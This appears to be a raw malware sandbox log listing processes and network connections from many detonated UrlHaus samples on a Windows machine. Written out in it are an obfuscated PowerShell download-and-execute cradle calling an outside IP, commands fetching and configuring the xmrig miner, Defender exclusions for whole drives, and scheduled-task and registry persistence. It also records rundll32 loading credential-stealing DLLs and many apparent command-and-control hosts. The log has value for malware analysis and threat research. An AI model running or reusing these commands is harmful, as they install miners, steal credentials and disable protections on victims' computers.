"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3264 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2240,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3400 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4044,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=4064 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4696,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=4728 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4976,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3940 /prefetch:1
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5D59.tmp\5D5A.tmp\5D5B.bat C:\Users\Admin\AppData\Roaming\run.exe"
C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe
"C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\clip64.dll, Main
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe', 'C:\Users\Admin\c3pool\xmrig.exe')"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrator:(OI)(CI)F /t /c
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrators:(OI)(CI)F /t /c
C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8700 -ip 8700
C:\Users\Admin\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
"C:\Users\Admin\AppData\Local\Temp\Aplanogamete\IDRBackup.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8700 -s 536
C:\Users\Admin\Downloads\UrlHausFiles\c1.exe
"C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe"
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe"
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe" -Embedding
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe9bf0fd08,0x7ffe9bf0fd14,0x7ffe9bf0fd20
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe
"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe', 'C:\Users\Admin\c3pool\nssm.exe')"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Downloads\UrlHausFiles\aaa.exe
"C:\Users\Admin\Downloads\UrlHausFiles\aaa.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im FLiNGTrainerUpdater.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im FLiNGTrainer.exe
C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Administrator\Desktop\Google Chrome.exe"
C:\Users\Admin\Downloads\UrlHausFiles\adm_atu.exe
"C:\Users\Admin\Downloads\UrlHausFiles\adm_atu.exe"
C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"url\": *\".*\",', '\"url\": \"auto.c3pool.org:80\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Administrator\Desktop\Coc Coc.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"user\": *\".*\",', '\"user\": \"\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
C:\Users\Admin\Downloads\UrlHausFiles\test26.exe
"C:\Users\Admin\Downloads\UrlHausFiles\test26.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 996
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted')
C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe
"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1324,2511817535852043756,16234768005361468078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3
C:\Users\Admin\Downloads\UrlHausFiles\stail.exe
"C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"
C:\Users\Admin\AppData\Local\Temp\is-G2HRC.tmp\stail.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G2HRC.tmp\stail.tmp" /SL5="$A0202,3886989,54272,C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause coder_media_11281
C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe
"C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe" -i
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"pass\": *\".*\",', '\"pass\": \"Gumlnlfe\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause coder_media_11281
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "eBGamer45" -Value "C:\ProgramData\BridgeGamer\BridgeGamer.exe"
C:\Windows\system32\schtasks.exe
SchTasks /Delete /TN "\Microsoft\Windows\Task Manager\Interactive" /F
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\cred64.dll, Main
C:\Users\Admin\Downloads\UrlHausFiles\bin.exe
"C:\Users\Admin\Downloads\UrlHausFiles\bin.exe"
C:\Users\Admin\Downloads\UrlHausFiles\file.exe
"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"
C:\Windows\SYSTEM32\wscript.exe
"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
C:\Windows\system32\schtasks.exe
SchTasks /Delete /TN "\Microsoft\Windows\USB\Usb-Notifications" /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 46102' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Windows\system32\config\systemprofile\AppData\Roaming\Network46102Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Users\Admin\AppData\Roaming\toolsync_RO\IDRBackup.exe
C:\Users\Admin\AppData\Roaming\toolsync_RO\IDRBackup.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe
"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
C:\Windows\system32\schtasks.exe
SchTasks /Delete /TN "\Microsoft\Windows\Feedback\Siuf\DmClient" /F
C:\Windows\SYSTEM32\cmd.exe
cmd
C:\Windows\SysWOW64\netbtugc.exe
"C:\Windows\SysWOW64\netbtugc.exe"
C:\Users\Admin\Downloads\UrlHausFiles\client.exe
"C:\Users\Admin\Downloads\UrlHausFiles\client.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
C:\Windows\system32\schtasks.exe
SchTasks /Delete /TN "Fix Getting Devices" /F
C:\Users\Admin\Downloads\UrlHausFiles\iupdate.exe
"C:\Users\Admin\Downloads\UrlHausFiles\iupdate.exe"
C:\Program Files (x86)\seetrol\client\SeetrolClient.exe
"C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\System32\ipconfig.exe" /flushdns
C:\Users\Admin\Downloads\UrlHausFiles\shell.exe
"C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\c3pool\\xmrig.log\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f4 0x470
C:\Windows\system32\schtasks.exe
SchTasks /Delete /TN "Windows Optimize" /F
C:\Windows\system32\schtasks.exe
SchTasks /Delete /TN "ChangeWallpaper" /F
Network
| US | 8.8.8.8:53 | 237.127.142.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.73.88.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.13.248.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.121.230.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.110.170.122.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.173.77.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.saf-oil.ru | udp |
| US | 8.8.8.8:53 | 52.97.26.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| BG | 87.121.86.16:80 | utorrent-backup-server5.top | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server5.top | tcp |
| CN | 211.149.230.178:80 | www.hseda.com | tcp |
| VN | 103.216.119.164:80 | xinhgai.tv | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server5.top | tcp |
| US | 172.66.0.235:443 | pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server5.top | tcp |
| US | 23.122.210.174:80 | 23-122-210-174.lightspeed.cicril.sbcglobal.net | tcp |
| US | 50.31.188.149:443 | cvinetwork.org | tcp |
| BR | 186.225.153.226:443 | palharesinformatica.com.br | tcp |
| US | 8.8.8.8:53 | eoufaoeuhoauengi.su | udp |
| RU | 87.236.16.222:443 | www.saf-oil.ru | tcp |
| GB | 165.220.134.146:80 | 165.220.134.146 | tcp |
| RU | 185.215.113.66:80 | eoufaoeuhoauengi.su | tcp |
| US | 8.8.8.8:53 | 235.0.66.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.16.236.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.188.31.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.210.122.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.153.225.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.119.216.103.in-addr.arpa | udp |
| US | 67.213.59.251:80 | 67.213.59.251 | tcp |
| US | 8.8.8.8:53 | a15aaa1.oss-cn-hongkong.aliyuncs.com | udp |
| US | 8.8.8.8:53 | utorrent-backup-server.top | udp |
| US | 8.8.8.8:53 | soft.110route.com | udp |
| US | 8.8.8.8:53 | 146.134.220.165.in-addr.arpa | udp |
| CN | 47.98.177.117:8888 | tcp | |
| CN | 49.232.126.36:9000 | tcp | |
| KR | 112.217.207.130:80 | 112.217.207.130 | tcp |
| US | 8.8.8.8:53 | ftp.ywxww.net | udp |
| US | 8.8.8.8:53 | 251.59.213.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.207.217.112.in-addr.arpa | udp |
| NL | 194.15.46.189:80 | 194.15.46.189 | tcp |
| CN | 112.27.189.32:8090 | tcp | |
| US | 8.8.8.8:53 | 189.46.15.194.in-addr.arpa | udp |
| HK | 47.79.66.210:80 | a15aaa1.oss-cn-hongkong.aliyuncs.com | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server.top | tcp |
| CN | 39.106.158.243:80 | soft.110route.com | tcp |
| US | 8.8.8.8:53 | cfs10.blog.daum.net | udp |
| US | 8.8.8.8:53 | 210.66.79.47.in-addr.arpa | udp |
| SE | 94.255.218.185:80 | 94.255.218.185 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | kotov.lol | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 185.218.255.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.8.203.116.in-addr.arpa | udp |
| CN | 60.191.208.187:820 | ftp.ywxww.net | tcp |
| KR | 203.232.37.151:80 | 203.232.37.151 | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | tail-cease.cyou | udp |
| US | 104.21.93.105:443 | tail-cease.cyou | tcp |
| US | 8.8.8.8:53 | plastic-mitten.sbs | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | looky-marked.sbs | udp |
| US | 8.8.8.8:53 | wrench-creter.sbs | udp |
| US | 104.243.129.2:80 | 104.243.129.2 | tcp |
| BR | 187.115.56.93:80 | 187.115.56.93 | tcp |
| TW | 203.204.217.190:8080 | 203.204.217.190 | tcp |
| US | 8.8.8.8:53 | pid.fly160.com | udp |
| US | 8.8.8.8:53 | slam-whipp.sbs | udp |
| US | 8.8.8.8:53 | record-envyp.sbs | udp |
| TH | 58.9.110.23:18063 | tcp | |
| US | 8.8.8.8:53 | copper-replace.sbs | udp |
| US | 8.8.8.8:53 | savvy-steereo.sbs | udp |
| US | 8.8.8.8:53 | preside-comforter.sbs | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 151.37.232.203.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.93.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.129.243.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.56.115.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.217.204.203.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| KR | 121.53.85.3:80 | cfs10.blog.daum.net | tcp |
| US | 8.8.8.8:53 | by.haory.cn | udp |
| US | 8.8.8.8:53 | marshal-zhukov.com | udp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| US | 8.8.8.8:53 | 80.160.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.85.53.121.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| DE | 217.92.214.15:8088 | 217.92.214.15 | tcp |
| CN | 182.92.0.5:80 | pid.fly160.com | tcp |
| CN | 39.108.237.194:80 | tcp | |
| KR | 1.214.192.147:80 | 1.214.192.147 | tcp |
| CN | 101.226.27.118:80 | by.haory.cn | tcp |
| US | 209.141.35.225:80 | 209.141.35.225 | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | mohibkal.publicvm.com | udp |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| US | 8.8.8.8:53 | 15.214.92.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.35.141.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.192.214.1.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ser.nrovn.xyz | udp |
| VN | 103.77.173.146:7707 | ser.nrovn.xyz | tcp |
| US | 8.8.8.8:53 | mininews.kpzip.com | udp |
| US | 38.114.122.39:443 | tcp | |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| CN | 150.158.25.244:9000 | tcp | |
| US | 8.8.8.8:53 | 39.122.114.38.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cd.textfiles.com | udp |
| US | 8.8.8.8:53 | www.aqianniao.com | udp |
| US | 8.8.8.8:53 | 172-105-66-118.ip.linodeusercontent.com | udp |
| US | 8.8.8.8:53 | down10d.zol.com.cn | udp |
| US | 8.8.8.8:53 | tianyinsoft.top | udp |
| RU | 176.111.174.138:8000 | 176.111.174.138 | tcp |
| US | 8.8.8.8:53 | www.xn--on3b15m2lco2u.com | udp |
| CN | 202.107.235.202:8088 | tcp | |
| US | 8.8.8.8:53 | dow.andylab.cn | udp |
| US | 8.8.8.8:53 | tengfeidn.com | udp |
| US | 8.8.8.8:53 | 138.174.111.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | softbank126023203236.bbtec.net | udp |
| VN | 103.173.254.78:80 | 103.173.254.78 | tcp |
| CN | 211.97.92.167:80 | mininews.kpzip.com | tcp |
| CN | 110.40.51.56:5700 | tcp | |
| CN | 47.120.46.210:80 | tcp | |
| CN | 58.215.245.2:9000 | tcp | |
| CN | 106.42.31.65:8088 | tcp | |
| RU | 92.127.156.174:8880 | 92.127.156.174 | tcp |
| KR | 218.147.147.172:80 | tcp | |
| CN | 119.32.29.121:8309 | tcp | |
| VN | 103.167.89.125:80 | 103.167.89.125 | tcp |
| CZ | 77.240.97.71:81 | 77.240.97.71 | tcp |
| CL | 190.215.253.57:80 | 190.215.253.57 | tcp |
| US | 166.150.43.236:80 | 166.150.43.236 | tcp |
| CN | 47.104.169.91:80 | tcp | |
| CN | 113.106.6.106:14319 | tcp | |
| VN | 113.160.249.9:80 | 113.160.249.9 | tcp |
| CN | 47.104.173.216:8082 | tcp | |
| IN | 43.240.65.55:81 | 43.240.65.55 | tcp |
| CN | 180.167.115.186:8011 | tcp | |
| US | 144.34.162.13:80 | 144.34.162.13 | tcp |
| US | 8.8.8.8:53 | a23uuu1.oss-cn-hongkong.aliyuncs.com | udp |
| KW | 178.61.160.6:5001 | 178.61.160.6 | tcp |
| US | 8.8.8.8:53 | 71.97.240.77.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| HK | 47.79.66.210:443 | a23uuu1.oss-cn-hongkong.aliyuncs.com | tcp |
| US | 208.86.224.90:80 | cd.textfiles.com | tcp |
| DE | 172.105.66.118:80 | 172-105-66-118.ip.linodeusercontent.com | tcp |
| CN | 139.9.248.128:80 | tianyinsoft.top | tcp |
| JP | 126.23.203.236:80 | softbank126023203236.bbtec.net | tcp |
| CN | 122.143.2.98:80 | down10d.zol.com.cn | tcp |
| CN | 116.142.249.98:80 | dow.andylab.cn | tcp |
| CN | 139.196.217.38:80 | tengfeidn.com | tcp |
| CN | 113.219.142.35:80 | www.aqianniao.com | tcp |
| KR | 221.139.49.8:80 | www.xn--on3b15m2lco2u.com | tcp |
| US | 8.8.8.8:53 | 174.156.127.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.65.240.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.43.150.166.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.160.61.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.162.34.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.253.215.190.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.254.173.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.249.160.113.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.89.167.103.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | www.pornhub.com | udp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| US | 206.217.142.166:1234 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 8.8.8.8:53 | 236.203.23.126.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.trafficjunky.com | udp |
| US | 8.8.8.8:53 | ei.phncdn.com | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
